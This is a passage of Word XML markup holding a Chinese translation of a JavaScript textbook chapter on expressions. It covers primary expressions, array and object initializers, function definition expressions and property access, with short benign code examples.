      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>我们在</w:t>
      </w:r>
      <w:r>
        <w:t>3.3</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
      </w:r>
      <w:r>
        <w:t>3.4</w:t>
      </w:r>
      <w:r>
        <w:t>节中学习了</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。和其他关键字不同，</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>并不是一个常量，它在程序的不同地方返回的值也不相同。</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>关键字经常在面向对象编程中出现。在一个方法体内，</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>返回调用这个方法的对象。参照</w:t>
      </w:r>
      <w:r>
        <w:t>4.5</w:t>
      </w:r>
      <w:r>
        <w:t>节、第</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>章（</w:t>
      </w:r>
      <w:r>
        <w:t>8.2.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）和第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章来获取关于</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>的详细信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后，第三种原始表达式是变量：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>i//</w:t>
      </w:r>
      <w:r>
        <w:t>返回变量</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>sum//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>sum</w:t>
      </w:r>
      <w:r>
        <w:t>的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>undefined//undefined</w:t>
      </w:r>
      <w:r>
        <w:t>是全局变量，和</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>不同，它不是一个关键字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码中出现了标识符，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>会将其当做变量而去查找它的值。如果变量名不存在，表达式运算结果为</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。然而，在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>的严格模式中，对不存在的变量进行求值会抛出一个引用错误异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="4_2_Dui_Xiang_He_Shu_Zu_De_Chu_Shi_Hua_B"/>
      <w:r>
        <w:t>4.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　对象和数组的初始化表达式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象和数组初始化表达式实际上是一个新创建的对象和数组。这些初始化表达式有时称做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>对象直接量</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>数组直接量</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。然而和布尔直接</w:t>
      </w:r>
      <w:r>
        <w:t>量不同，它们不是原始表达式，因为它们所包含的成</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>员或者元素都是子表达式。数组初始化表达式语法非常简单，我们以此开始。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数组初始化表达式是通过一对方括号和其内由逗号隔开的列表构成的。初始化的结果是一个新创建的数组。数组的元素是逗号分隔的表达式的值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[]//</w:t>
      </w:r>
      <w:r>
        <w:t>一个空数组：</w:t>
      </w:r>
      <w:r>
        <w:t>[]</w:t>
      </w:r>
      <w:r>
        <w:t>内留空即表示该数组没有任何元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[1+2,3+4]//</w:t>
      </w:r>
      <w:r>
        <w:t>拥有两个元素的数组，第一个是</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>，第二个是</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数组初始化表达式中的元素初始化表达式也可以是数组初始化表达式。也就是说，这些表达式是可以嵌套的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var matrix=[[1,2,3],</w:t>
      </w:r>
      <w:r>
        <w:t>[4,5,6],[7,8,9]];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对数组初始化表达式进行求值的时候，数组初始化表达式中的元素表达式也都会各自计算一次。也就是说，数组初始化表达式每次计算的值有可能是不同的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数组直接量中的列表逗号之间的元素可以省略，这时省略的空位会填充值</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。例如，下面这个数组包含</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>个元素，其中三个元素是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var sparseArray=[1,,,,5];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数组直接量的元素列表结尾处可以留下单个逗号，这时并不会创建一个新的值为</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象初始</w:t>
      </w:r>
      <w:r>
        <w:t>化表达式和数组初始化表达式非常类似，只是方括号被花括号代替，并且每个子表达式都包含一个属性名和一个冒号作为前缀：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var p={x:2.3,y:-1.2};//</w:t>
      </w:r>
      <w:r>
        <w:t>一个拥有两个属性成员的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var q={};//</w:t>
      </w:r>
      <w:r>
        <w:t>一个空对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>q.x=2.3;q.y=-1.2;//q</w:t>
      </w:r>
      <w:r>
        <w:t>的属性成员和</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>的一样</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象直接量也可以嵌套，比如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var rectangle={upperLeft:{x:2,y:2},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>lowerRight:{x:4,y:5}};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>求对象初始化表达式的值的时候，对象表达式也都会各自计算一次，并且它们不必包含常数值：它们可以是任意</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>表达式。同样，对象直接量中的属性名称可以是字符串而不</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>是标识符（这在那些只能使用保留字或一些非法标识符作为属性名的地方非常有用）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var side=1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var square={"upperLeft":{x:p.x,y:p.y},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>'lowerRight':{x:p.x+side,y:p.y+side}};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>章和第</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>章会再次讨论对象和数组的初始化表达式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="4_3_Han_Shu_Ding_Yi_Biao_Da_Shi_"/>
      <w:r>
        <w:t>4.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>函数定义表达式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>函数定义表达式定义一个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数。表达式的值是这个新定义的函数。从某种意义上讲，函数定义表达式可称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>函数直接量</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，毕竟对象初始化表达式也称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>对象直接量</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。一个典型的函数定义表达式包含关键字</w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t>，跟随其后的是一对圆括号，括号内是一个以逗号分割的列表，列表含有</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>个或多个标识符（参数名），然后再跟随一个由花括号包裹的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码段（函数体），例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个函数返回传入参数值的平方</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var square=function(x){return x*x;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>函数定义表达式同样可以包含函数的名字。函数也可以通过函数语句来定义，而不是函数表达式。更多详情会在第</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>章中讨论。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="4_4_Shu_Xing_Fang_Wen_Biao_Da_Shi_"/>
      <w:r>
        <w:t>4.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　属性访问表达式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性访问表达式运算得到一个对象属性或一个数组元素的值。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>为属性访问定义了两种语法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>expression.identifer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>expression[expression]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第一种写法是一个表达式后跟随一个句点和标识符。表达式指定对象，标识符则指定需要访问的属性的名称。第二种写法是使用方括号，方括号内是另外一个表达式（这种方法适用于对象和数组）。第二</w:t>
      </w:r>
      <w:r>
        <w:t>个表达式指定要访问的属性的名称或者代表要访问数组元素的索引。这里有一些具体的例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o={x:1,y:{z:3}};//</w:t>
      </w:r>
      <w:r>
        <w:t>一个示例对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=[o,4,[5,6]];//</w:t>
      </w:r>
      <w:r>
        <w:t>一个包含这个对象的示例数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.x//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:t>表达式</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.y.z//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>3:</w:t>
      </w:r>
      <w:r>
        <w:t>表达式</w:t>
      </w:r>
      <w:r>
        <w:t>o.y</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>z</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o["x"]//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a[1]//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>4:</w:t>
      </w:r>
      <w:r>
        <w:t>表达式</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>中索引为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a[2]["1"]//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>6:</w:t>
      </w:r>
      <w:r>
        <w:t>表达式</w:t>
      </w:r>
      <w:r>
        <w:t>a[2]</w:t>
      </w:r>
      <w:r>
        <w:t>中索引为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a[0].x//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:t>表达式</w:t>
      </w:r>
      <w:r>
        <w:t>a[0]</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>不管使用哪种形式的属性访问表达式，在</w:t>
      </w:r>
      <w:r>
        <w:t>“.”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“[”</w:t>
      </w:r>
      <w:r>
        <w:t>之前的表达式总是会首先计算。如果计算结果是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>，表达式会抛出一个类型错误异常，因为这两个值都不能包含任意属性。如果运算结果不是对象（或者数组），</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>会将其转换为对象（参考</w:t>
      </w:r>
      <w:r>
        <w:t>3.6</w:t>
      </w:r>
      <w:r>
        <w:t>节）。如果对象表达式后跟随句点和标识符，则会查找由这个标识符所指定的属性的值，并将其作为整个表达式的值返回。如果对象表达式后跟随一对方括号，则会计算方括号内的表达式的值并将它转换为字符串。不论哪种情况，如果命名的属性不存在，那么整个属性访问表达</w:t>
      </w:r>
      <w:r>
        <w:t>式的值就是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>显然</w:t>
      </w:r>
      <w:r>
        <w:t>.identifier</w:t>
      </w:r>
      <w:r>
